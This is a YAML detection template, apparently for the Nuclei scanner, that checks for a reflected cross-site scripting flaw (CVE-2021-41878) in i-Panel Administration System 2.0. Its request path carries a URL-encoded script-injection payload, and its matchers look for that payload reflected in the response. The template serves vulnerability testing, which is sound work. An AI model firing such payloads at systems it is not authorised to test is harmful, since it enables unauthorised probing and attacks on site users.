41 lines
1.2 KiB
YAML
41 lines
1.2 KiB
YAML
id: CVE-2021-41878
|
|
|
|
info:
|
|
name: i-Panel Administration System - Cross-Site Scripting
|
|
author: madrobot
|
|
severity: medium
|
|
description: A reflected cross-site scripting vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-41878
|
|
- https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41878
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-41878
|
|
cwe-id: CWE-79
|
|
tags: cve,cve2021,justwriting,xss
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/lostpassword.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
part: body
|
|
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header
|
|
|
|
# Enhanced by mp on 2022/02/27
|